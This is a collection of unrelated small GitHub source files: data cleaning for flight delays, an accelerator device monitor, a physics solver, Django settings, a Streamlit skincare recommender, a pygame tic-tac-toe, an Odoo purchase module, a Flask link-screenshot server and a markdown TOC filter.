action.reset_index(drop=True)\naction.to_csv(\"action_2.csv\",index=False)\n'''\n\n# number of nan in action\n'''action.isnull().sum()\nreal_deptime 71486\nreal_arrtime 71280\nplane_id 32024\nothers \t\t 0\nlen(action) = 1325127\n71486/1325127.0 = 5.4%\nQ: thoes are canceled?\nlen(action[action.canceled_or_not==0]) -- 71302\nlen(action[action.canceled_or_not==0 & action.real_deptime.isnull()]) --- 71302\nA: roughly, lines where real_deptime is null are all canceled\nlen(action[action.canceled_or_not==1 & action.real_deptime.isnull()]) ----564\nA: some that have no time information are not canceled \n'''\n# norm_dur : norm duration = planned_arrtime - planned_deptime\n# real_dur = real_arrtime - planned_deptime <--!!!!!!\n# type of duration: datetime.timedelta .days, .seconds\naction['norm_dur'] = map(lambda x,y: datetime.fromtimestamp(y)-datetime.fromtimestamp(x),action['planned_deptime'],action['planned_arrtime'])\naction['delay'] = map(convert_dur,action['planned_arrtime'],action['real_arrtime'])\naction['real_dur'] = map(convert_dur,action['real_deptime'],action['real_arrtime'])\n# abnormal records: len(action[action.planned_deptime == action.planned_arrtime])/float(len(action)) 1%\n# planned_deptime == planned_arrtime\naction = action[action.planned_deptime != action.planned_arrtime]\n# depart before planned dep time (20min before)---see as abnormal ---0.04%\naction['plan-real_deptime'] = map(convert_dur,action['real_deptime'],action['planned_deptime'])\naction = 
action[~(action['plan-real_deptime'] > pd.Timedelta('0 days 00:20:00'))]\n# in action history, the percentage of delaying longer than 3 hours:\n# len(action[action.delay > pd.Timedelta('0 days 03:00:00')])/float(len(action)) ----- 3.6%; 3h10m: 3.27%; 3h20m: 2.94%\n# > 4 hours: 1.98%; > 5 hours: 1.1%; > 6 hours: 0.6%;------ > 2 hours: 7%; > 1 hour: 14.9%; > 30 min: 23.6%\n# len(action[action.canceled_or_not == 0])/float(len(action)) ----- 5.2% flights are canceled\n# len(set(submission_sample.Flightno)- set(action.airline)) -- 790 out of 144396 new airlines that does not appear in action history\n# compare with pd.Timedelta('0 days 03:00:00'), consider prop, maybe set different weights \n\n# split first two chars of airline\n\n#---------------------------------\n# extract the special data\nstart1 = '2015-05-15 00:00:00Z'\nend1 = '2015-07-15 00:00:00Z'\nstart2 = '2016-05-15 00:00:00Z'\nend2 = '2016-07-15 00:00:00Z'\nstart3 = '2017-05-15 00:00:00Z'\nend3 = '2017-07-15 00:00:00Z'\nlspecial = ((special['collect_time'] > start1) & (special['collect_time'] < end1)) | ((special['collect_time'] > start2) & (special['collect_time'] < end2)) | ((special['collect_time'] > start3) & (special['collect_time'] < end3))\nspecial = special[lspecial]\nspecial = special.reset_index()\n# three hours = 60*3*60 = 10800 seconds\n#(datetime.fromtimestamp(1463357100) - datetime.fromtimestamp(1463352000)).seconds\n#(datetime.fromtimestamp(1463357100) - datetime.fromtimestamp(1463352000)).days\n\n#---------submission sample\nsubmission_sample['norm_dur'] = map(lambda x,y: datetime.fromtimestamp(y)-datetime.fromtimestamp(x),submission_sample['PlannedDeptime'],submission_sample['PlannedArrtime'])\n","repo_name":"yuand23/contests","sub_path":"CTRIP_airline_delay_prediction/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10739880593","text":"#!/usr/bin/env python3\n\nimport psycopg2\nimport signal\nimport pycx4.qcda as cda\n\nfrom aux.service_daemon import QtService\nfrom .device import Dev\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\nclass IcWatcher:\n \"\"\"\n watching for DR elements status\n \"\"\"\n def __init__(self):\n super(IcWatcher, self).__init__()\n try:\n self.conn = psycopg2.connect(dbname='icdata', user='postgres', host='pg10-srv', password='')\n print(\"Connected to DB\")\n except:\n print(\"No access to DB\")\n\n self.sys_info_d = {'logs': cda.StrChan('cxhw:1.ic_watcher.logs', max_nelems=1024, on_update=1),\n 'ofr': cda.StrChan('cxhw:1.ic_watcher.ofr', max_nelems=1024, on_update=1)}\n self.ofr_list = []\n\n self.dev_chans_list = []\n\n self.conditions_um4 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 8000,\n 'down_lim': 200, 'err_code': 'I_mes_problem'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 13, 'down_lim': 0,\n 'err_code': 'U_out_of_range'}]\n self.conditions_vs = [{'func': 'range_state', 'chans': ['Imes'], 'up_lim': 256, 'down_lim': 0,\n 'err_code': 'I_out_of_range'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 7, 'down_lim': 2,\n 'err_code': 'U_out_of_range'}]\n self.conditions_um15 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 8000,\n 'down_lim': 200, 'err_code': 'I_mes_problem'}]\n self.conditions_vch300 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'}]\n self.conditions_v300 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'}]\n self.conditions_pa10 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 13, 'down_lim': 0,\n 'err_code': 'U_out_of_range'}]\n self.conditions_vch1000 = [\n {'func': 'curr_state', 'chans': ['Iset', 'dcct1'], 'wait_time': 3000, 'up_lim': 5000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'is_on', 'chans': ['is_on'], 'err_code': 'PS is off'},\n {'func': 'ilk', 'chans': ['ilk_imax', 'ilk_inverter', 'ilk_out_prot1',\n 'ilk_out_prot2', 'ilk_out_prot3', 'ilk_phase', 'ilk_temp'],\n 'wait_time': 3000, 'err_code': 'Interlock'}]\n self.conditions_ist = [\n {'func': 'curr_state', 'chans': ['Iset', 'dcct1'], 'wait_time': 3000, 'up_lim': 5000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'is_on', 'chans': ['is_on'], 'err_code': 'is_on'},\n {'func': 'ilk', 'chans': ['ilk_imax', 'ilk_umax', 'ilk_out_prot', 'ilk_phase', 'ilk_temp', 'ilk_water',\n 'ilk_battery'], 'wait_time': 3000, 'err_code': 'Interlock'}]\n\n self.conditions_dict = {'UM15': self.conditions_um15, 'UM4': self.conditions_um4, 'vaciva': self.conditions_vs,\n 'vac124': self.conditions_vs, 'vch300': self.conditions_vch300,\n 'v300': self.conditions_v300, 'pa10': self.conditions_pa10,\n 'vch1000': self.conditions_vch1000, 'ist': self.conditions_ist}\n self.state_chans_dict = {'magnet': [], 'ion_pump': []}\n self.choose_state_dict = {'UM15': 'magnet', 'UM4': 'magnet', 'vaciva': 'ion_pump', 'vac124': 'ion_pump',\n 'vch300': 'magnet', 'v300': 'magnet', 'pa10': 'magnet', 'vch1000': 'magnet',\n 'ist': 'magnet'}\n self.chans_dict = {'UM15': [], 'UM4': [], 'vaciva': [], 'vac124': [], 'vch300': [], 'v300': [], 'pa10': [],\n 'vch1000': [], 'ist': []}\n self.devnames_dict = 
{'UM15': [], 'UM4': [], 'vaciva': [], 'vac124': [], 'vch300': [], 'v300': [], 'pa10': [],\n 'vch1000': [], 'ist': []}\n\n self.cur = self.conn.cursor()\n self.cur.execute(\"select devtype.name, chan.name from chan,devtype_chans,devtype \"\n \"where chan.id=devtype_chans.chan_id and devtype.id=devtype_chans.devtype_id and \"\n \"devtype.name in ('magnet', 'ion_pump') group by grouping sets((devtype.name, chan.name))\")\n for elem in self.cur.fetchall():\n self.state_chans_dict[elem[0]].append(elem[1])\n print('state_chans_dict', self.state_chans_dict)\n\n self.cur.execute(\"select devtype.name, chan.name from chan,devtype_chans,devtype \"\n \"where chan.id=devtype_chans.chan_id and devtype.id=devtype_chans.devtype_id and \"\n \"devtype.name in ('UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist') group by grouping sets((devtype.name, chan.name))\")\n # 'UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist'\n for elem in self.cur.fetchall():\n self.chans_dict[elem[0]].append(elem[1])\n print(self.chans_dict)\n\n self.cur.execute(\"select devtype.name, namesys.name || '.' || dev.name as full_name from dev,dev_devtype,devtype, namesys \"\n \"where dev.id=dev_devtype.dev_id and devtype.id=dev_devtype.devtype_id and namesys.id=dev.namesys_id and \"\n \"devtype.name in ('UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist') group by grouping sets((devtype.name, full_name))\")\n for elem in self.cur.fetchall():\n self.devnames_dict[elem[0]].append(elem[1])\n # self.devnames_dict['ist'].append('canhw:11.vit_sim_ist')\n print('devname_dict', self.devnames_dict)\n\n for elem in self.devnames_dict:\n for dname in self.devnames_dict[elem]:\n self.dev_chans_list.append(Dev(dname, self.chans_dict[elem], self.conditions_dict[elem],\n self.state_chans_dict[self.choose_state_dict[elem]],\n self.sys_info_d, self.ofr_list))\n\n\nclass ICWService(QtService):\n def main(self):\n self.w = IcWatcher()\n\n def clean(self):\n self.log_str('exiting from icw')\n\n\nicw_d = ICWService(\"ic_watcher\")\n","repo_name":"vitaliibalakin/ic_watcher","sub_path":"wather_logic/icw.py","file_name":"icw.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702400916","text":"#!/usr/bin/env python3\n\"\"\"\nThis code solves the Schrodinger-Poisson system\ncreated: Thu Jan 23 15:00\n@author: mandar\n\"\"\"\n\nimport numpy as np\nimport h5py as hp\nimport os\n\nfrom functions import spectral_calc\n\ndef pot(psi, V, dt, h, m):\n \"\"\"Potential Half-Step\"\"\"\n return np.exp(-1j * m * V * dt / h) * psi\n\ndef kin(psi, k, dt, h, m):\n \"\"\"Kinetic Step\"\"\"\n return np.fft.ifft(np.exp(-1j * (k ** 2) * h * dt / (4 * m)) * np.fft.fft(psi))\n\ndef poisson_fft(psi, k):\n \"\"\"Poisson solver\"\"\"\n H0 = 100\n den = 3 * (H0**2) * ((np.abs(psi) ** 2) - 1) / 2\n V = np.fft.fft(den)\n V[0] = 0\n V[1:] /= -k[1:] ** 2\n return np.fft.ifft(V)\n\ndef phase(nd, k):\n H0 = 100\n V = np.fft.fft(nd)\n V[0] = 0\n V[1:] /= -k[1:] ** 2\n return (np.fft.ifft(V)) * H0\n\ndef time_ev(psi, k, t0, dt, tn, m, h, H0, loc, N_out=100):\n \"\"\"The Propagator\"\"\"\n x = np.arange(0, 2*np.pi, (2*np.pi)/k.size)\n t = t0\n name = 0\n count = 0\n flag = 1\n write_out(loc, name, t, psi)\n\n while flag == 1:\n\n #kinetic half-step; eta increased by Δη/4\n psi = kin(psi, k, dt, h, m)\n t += dt / 4\n V = poisson_fft(psi, k)\n\n #potential half-step; eta increased by Δη/2 (in total by Δη/4 + Δη/2)\n psi = pot(psi, V, dt, h, m)\n t += dt / 2\n\n #kinetic half-step; eta increased by Δη/4 (in total by Δη)\n psi = kin(psi, k, dt, h, m)\n t += dt / 4\n\n count += 1\n if count == N_out:\n name += 1\n flag = write_out(loc, name, t, psi)\n count = 0\n if t > tn:\n flag = 0\n\n print('Solved for t = {}'.format(t))\n print('The last time step was {} \\n'.format(dt))\n print('\\nmean density in the box is = {}'.format(np.mean(np.abs(psi**2) - 1)))\n\n if flag == 0:\n print('Stopping run...')\n write_out(loc, name, t, psi)\n print('Done!')\n\ndef flagger(loc):\n if os.path.exists(str(loc) + 'stop'):\n os.remove(str(loc) + 'stop')\n return 0\n else:\n return 1\n\ndef write_out(loc, name, t, psi):\n print('Writing output file for t = {}'.format(t))\n filename = str(loc) + 'psi_{0:05d}.hdf5'.format(name)\n with hp.File(filename, 'w') as hdf:\n hdf.create_dataset('t', data=t)\n hdf.create_dataset('psi', data=psi)\n flag_loc = flagger(loc)\n if flag_loc == 0:\n return flag_loc\n else:\n return 1\n","repo_name":"mandarmk9/eft_code","sub_path":"non_exp_sch.py","file_name":"non_exp_sch.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74104350946","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport secure\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = secure.secret_key\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nAUTH_USER_MODEL = 'jirello.User'\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'haystack',\n 'debug_toolbar',\n 'jirello',\n 'guardian',\n 'django.contrib.humanize',\n 'django_celery_beat',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'guardian.backends.ObjectPermissionBackend',\n)\n\nLOGIN_URL = '/jirello/login/'\n\nROOT_URLCONF = 'arez_pet.urls'\n\n\nTEMPLATE_PATH = os.path.join(BASE_DIR, 'templates')\n\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [TEMPLATE_PATH],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'arez_pet.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = secure.db_config\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\nSTATIC_PATH = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n STATIC_PATH,\n)\n\nMEDIA_PATH = os.path.join(BASE_DIR, 'media', )\nMEDIA_ROOT = (os.path.join(BASE_DIR, 'media'))\nMEDIA_URL = '/media/'\nMEDIAFILES_DIRS = (\n MEDIA_PATH,\n)\n\nINTERNAL_IPS = secure.internal_ips\n\nGUARDIAN_RAISE_403 = True\n\nGUARDIAN_TEMPLATE_403 = True\n\nUSE_L10N = True\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'simple': {\n 'format': '%(asctime)s %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'jirello.log'),\n 'formatter': 'simple'},\n },\n 'loggers': {\n 'jirello': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n\n# HAYSTACK + ELASTICSEARCH\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine',\n 'URL': 'http://127.0.0.1:9200/',\n 'INDEX_NAME': 'haystack',\n },\n}\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n\n\n# REDIS + 
CELERY\n\nCELERY_BROKER_URL = 'redis://localhost:6379/0'\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'Europe/Kiev'\n\n# EMAIL HOST\n\nEMAIL_USE_TLS = True\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_PASSWORD = secure.host_password\nEMAIL_HOST_USER = secure.host_user\nEMAIL_PORT = 587\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n","repo_name":"ArezKhalimi/jirello","sub_path":"arez_pet/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"30481069834","text":"import pandas as pd\nimport streamlit as st\nfrom streamlit import session_state as session\nfrom PIL import Image\nimport os\nfrom recommend import recommend_table\nfrom text import show_text_elements\nimport time\n\n@st.cache_data(persist=True, show_spinner=False)\ndef load_data():\n \n df = pd.read_csv(\"sc-price.csv\")\n return df\n\ndef load_image(img):\n\tim = Image.open(os.path.join(img))\n\treturn im\n\nst.set_page_config(layout=\"wide\")\n\nimage = Image.open('img/image.png')\n\ncol1, col2 = st.columns([1, 8]) \n\nwith col1: \n st.image(image, width=100)\n\n\nwith col2: \n st.title(\"\"\"\n SISTEM REKOMENDASI SKINCARE\n \"\"\")\n\nst.text(\"\")\nst.text(\"\")\n\ntab1, tab2, tab3 = st.tabs([\"Rekomendasi\",\"Skin Type Guide\",\"Skincare Routine\"])\n\t\nwith tab1:\n\n df = load_data()\n \n st.subheader(\"\"\"\n Rekomendasi SKINCARE\n Temukan skincare yang cocok untukmu ✨\n \"\"\")\n\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n\n desc = st.text_input(label=\"Deskripsikan jenis kulit dan keluhan atau tujuan memakai skincare\", max_chars=50, help=\"contoh: kulit kering berjerawat noda hitam\", label_visibility=\"visible\")\n\n st.text(\"\")\n st.text(\"\")\n\n allergen = st.radio(\n \"Apakah memiliki alergi?\",\n ('Ya', 'Tidak'))\n\n st.text(\"\")\n st.text(\"\")\n\n buffer1, col1, buffer2 = st.columns([2, 1.35, 1])\n\n is_clicked = col1.button(label=\"Rekomendasi\")\n\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n\n if is_clicked:\n start = time.time()\n\n recommended_skincare = recommend_table(desc, allergen)\n def path_to_image_html(path):\n return ' '\n\n recommended_skincare['DESKRIPSI'] = recommended_skincare['DESKRIPSI'].str.replace('\\n', ' ')\n\n def add_row_color(row):\n if row.name < 3: # Hanya warnai 3 baris pertama\n return ['background-color: lightyellow'] * len(row)\n return [''] * len(row)\n\n if recommended_skincare.empty:\n st.error(\"No recommendations found for the given description.\")\n else:\n with st.container():\n st.title(\"Here's your recommendations\")\n st.success(\"Success in {} seconds, giving {} products\".format(time.time() - start, recommended_skincare.shape[0]))\n\n styled_table = recommended_skincare.reset_index(drop=True).style \\\n .apply(add_row_color, axis=1) \\\n .format(dict(GAMBAR=path_to_image_html))\n\n styled_table = styled_table.set_properties(subset=['DESKRIPSI'], **{'font-size': '12px'})\n\n table_html = styled_table.to_html()\n responsive_table_css = \"\"\"\n \n \"\"\"\n\n responsive_table_html = responsive_table_css + table_html\n\n st.markdown(f'{responsive_table_html}
', unsafe_allow_html=True)\n\n styled_table.to_html(\"webpage.html\", escape=False, formatters=dict(GAMBAR=path_to_image_html), index=False)\n\n st.text(\"\")\n \nwith tab2:\n st.subheader(\"\"\"\n SKIN TYPE GUIDE\n Kenali jenis kulitmu!\n \"\"\"\n )\n\n st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n\n st.image(load_image('img/jenis_kulit.jpg'))\n\n\n result = show_text_elements()\n\n st.text(result)\n \nwith tab3:\n st.subheader(\"\"\"\n SKINCARE ROUTINE\n Rangkaian perawatan skincare untuk pagi :mostly_sunny: dan malam :crescent_moon:\n \"\"\")\n st.text(\"\")\n st.text(\"\")\n st.image(load_image('img/sc-routine.jpg'), use_column_width=True)","repo_name":"annisaaml/streamlit-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73678277347","text":"import sys\n\nimport pygame as pg\nfrom pygame.locals import *\n\nfrom minimax_agent import Game\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nMAX_COLOR = (255, 136, 115, 88)\nMIN_COLOR = (117, 190, 224, 88)\nSELECTION_COLOR = (158, 255, 128, 88)\n\nSCREEN_HEIGHT = 300\nSCREEN_WIDTH = 300\n\n\ndef play_game(max_starts=True):\n pg.init()\n screen = pg.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\n pg.display.set_caption('Tic Tac Toe')\n\n char_font = pg.font.SysFont('msuigothic.ttf', 175)\n end_font = pg.font.SysFont('msuigothic.ttf', 50)\n\n boxes = {\n 0: pg.Rect(2, 2, 96, 96),\n 1: pg.Rect(102, 2, 96, 96),\n 2: pg.Rect(202, 2, 96, 96),\n 3: pg.Rect(2, 102, 96, 96),\n 4: pg.Rect(102, 102, 96, 96),\n 5: pg.Rect(202, 102, 96, 96),\n 6: pg.Rect(2, 202, 96, 96),\n 7: pg.Rect(102, 202, 96, 96),\n 8: pg.Rect(202, 202, 96, 96),\n }\n\n move_list = {\n 'X': [],\n 'O': []\n }\n\n symbols = {\n 'X': char_font.render('X', True, MAX_COLOR),\n 'O': char_font.render('O', True, MIN_COLOR)\n }\n\n print(\"\\n####################\")\n print(\"Use arrow keys to select a space.\\nPress enter to commit your move.\")\n print(\"####################\")\n\n game = Game.new_game(max_starts=max_starts)\n location = 0\n\n while not game.has_ended:\n draw_board(screen, move_list, boxes, symbols, player_loc=location)\n max_turn(game, move_list)\n for event in pg.event.get():\n if event.type == KEYDOWN:\n key = event.key\n if key == K_UP:\n if location > 2:\n location -= 3\n elif key == K_DOWN:\n if location < 6:\n location += 3\n elif key == K_RIGHT:\n if location not in [2, 5, 8]:\n location += 1\n elif key == K_LEFT:\n if location not in [0, 3, 6]:\n location -= 1\n elif key == K_RETURN:\n player_input(game, move_list, location)\n elif event.type == QUIT:\n pg.quit()\n sys.exit()\n pg.display.update()\n\n while True:\n draw_board(screen, move_list, boxes, symbols, player_loc=location)\n end_screen(screen, game, end_font)\n for event in pg.event.get():\n if event.type == QUIT or event.type == KEYDOWN:\n end_game_info(game)\n pg.quit()\n sys.exit()\n pg.display.update()\n\n\ndef draw_board(screen, move_list, boxes, symbols, player_loc):\n screen.fill(BLACK)\n draw_grid(screen)\n draw_moves(boxes, move_list, screen, symbols)\n draw_player(screen, player_loc, boxes)\n\n\ndef draw_grid(screen):\n for i in range(1, 3):\n pg.draw.line(screen, WHITE, (0, SCREEN_HEIGHT*i//3), (SCREEN_WIDTH, SCREEN_HEIGHT*i//3))\n pg.draw.line(screen, WHITE, (SCREEN_WIDTH*i//3, 0), (SCREEN_WIDTH*i//3, SCREEN_HEIGHT))\n\n\ndef draw_moves(boxes, move_list, screen, symbols):\n for sign, moves in move_list.items():\n for move in moves:\n screen.blit(symbols[sign], boxes[move])\n\n\ndef draw_player(screen, player_loc, boxes):\n pg.draw.rect(screen, SELECTION_COLOR, boxes[player_loc], width=2)\n\n\ndef max_turn(game, move_list):\n if game.max_turn:\n new_move = game.do_turn()\n move_list['X'].append(new_move)\n\n\ndef player_input(game, move_list, player_loc):\n if player_loc not in move_list['X'] and player_loc not in move_list['O']:\n game.turn_input(player_loc)\n move_list['O'].append(player_loc)\n\n\ndef end_screen(screen, game, font):\n message = \"Draw!\" if game.utility(game.state) == (False, 0) else f\"{game.winner} wins!\"\n message = font.render(message, True, BLACK, SELECTION_COLOR)\n message_center = message.get_rect(center=(SCREEN_WIDTH//2, SCREEN_HEIGHT//2))\n screen.blit(message, message_center)\n\n\ndef end_game_info(game):\n message = \"Draw!\" if game.utility(game.state) == (False, 0) else 
f\"{game.winner} wins!\"\n print(\"\\n####################\")\n print(message)\n print(\"####################\")\n","repo_name":"caseyeaster39/5210projects","sub_path":"project-3/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9344470156","text":"from openerp import models, fields, api, exceptions\n\n\n\n\n\n\n\nclass PurchaseOrderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n # STOCK IN EACH LOCATION\n @api.model\n def _compute_stock_by_location(self):\n\n # db_obj = self.pool['base.external.dbsource']\n\n res = {}\n for line in self:\n if line.product_id:\n product = line.product_id.id\n location_id = 12\n # ads = db_obj.get_stock(cr, SUPERUSER_ID, ids, product, location_id,\n # context=context)\n\n self.env.cr.execute(\"\"\" SELECT SUM(qty) AS QTY, CASE\n WHEN location_id='12' THEN 'G'\n WHEN location_id='19' THEN 'B'\n WHEN location_id='15' THEN 'P'\n END AS LOC FROM stock_quant\n WHERE (location_id ='12' OR location_id ='19' OR location_id='15')\n AND product_id = '%s' GROUP BY location_id ORDER BY location_id\"\"\" % product)\n res[line.id] = self.env.cr.dictfetchall()\n\n if not res[line.id]:\n res[line.id] = []\n else:\n # GRN\n if res[line.id][0]['loc'] == 'G':\n # res[line.id][0]['qty'] = res[line.id][0]['qty'] - ads\n res[line.id][0]['qty'] = res[line.id][0]['qty']\n counter = 0\n qty = \"\"\n qty_final = \"\"\n for location in res[line.id]:\n counter += 1\n qty += ' ' + str(res[line.id][counter - 1]['loc']) + \"=\" + str(\n res[line.id][counter - 1]['qty']) + ' '\n qty_final += qty\n\n line.stock_by_loc = qty_final\n\n stock_by_loc = fields.Char(compute=_compute_stock_by_location, string='Stocks')\n incoming = fields.Float(related='product_id.incoming_qty',string='IN')\n outgoing = fields.Float(related='product_id.outgoing_qty', string='OUT')\n\nPurchaseOrderLine()\n","repo_name":"dhecar/Motoscoot_V8","sub_path":"adaptaciones_motoscoot/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"43860554014","text":"import os\nimport base64\nimport logging\nimport traceback\n\nfrom io import BytesIO\nfrom utils import get_original_link\nfrom capture import capture\nfrom flask import Flask, render_template, request, redirect\n\n\napp = Flask(__name__)\n\n\nlogging.basicConfig(level=logging.DEBUG)\nLOGGER = logging.getLogger(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', result='', image=None, error=None)\n\n@app.route('/search', methods=['POST'])\ndef search():\n url = request.form['url']\n try:\n original_url = get_original_link(url)\n image = capture(original_url)\n buf = BytesIO()\n image.save(buf, format='png')\n image_str = base64.b64encode(buf.getvalue()).decode('utf-8')\n error = None\n result = original_url\n except Exception as e:\n LOGGER.error(traceback.format_exc())\n image_str = None\n error = str(e)\n result = None\n\n return render_template('index.html', error=error, result=result, image=image_str)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"takuseno/nsg","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36075823289","text":"import heapq\n\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n intervals.sort(key=lambda x: x[0]) #sort by start times\n \n rooms = [] #represents rooms\n \n heapq.heappush(rooms, intervals[0][1]) #allocate first meeting to room\n \n for i in range(1, len(intervals)):\n \n #if start time of meeting is after the end-time of meeting with least time, remove existing meeting\n if intervals[i][0] >= rooms[0]:\n heapq.heappop(rooms)\n \n #allocating meeting room\n heapq.heappush(rooms, intervals[i][1])\n \n return len(rooms)\n ","repo_name":"ggopalai/leetcode-python","sub_path":"ds/heaps/meeting_rooms_2.py","file_name":"meeting_rooms_2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15434993149","text":"from django import template\nfrom markdown import markdown\nfrom django.utils.safestring import mark_safe\nfrom bs4 import BeautifulSoup\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.styles import get_style_by_name\n\n\nregister = template.Library()\n\n@register.filter\ndef toc(text):\n\n html = markdown(text, extensions = ['markdown.extensions.tables', 'markdown.extensions.fenced_code', 'toc'])\n\n # Parse the HTML with BeautifulSoup\n soup = BeautifulSoup(html, 'html.parser')\n\n # Find all the headings in the HTML\n headings = soup.find_all(['h1', 'h2', 'h3', 'h4', 'h5', 'h6'])\n\n # Create a table of contents\n toc_html = ''\n for heading in headings:\n # Get the text and ID of the heading\n heading_text = heading.text.strip()\n heading_id = heading.get('id')\n\n # Add the heading to the table of contents\n toc_html += f'{heading_text} '\n\n # Add the ID to the heading if it doesn't already have one\n if not heading_id:\n heading['id'] = heading_text.replace(' ', '-').lower()\n\n toc_html += ' '\n\n return mark_safe(toc_html)\n\n\n@register.filter\ndef markdownify(text):\n\n html = markdown(text, extensions = ['markdown.extensions.tables', 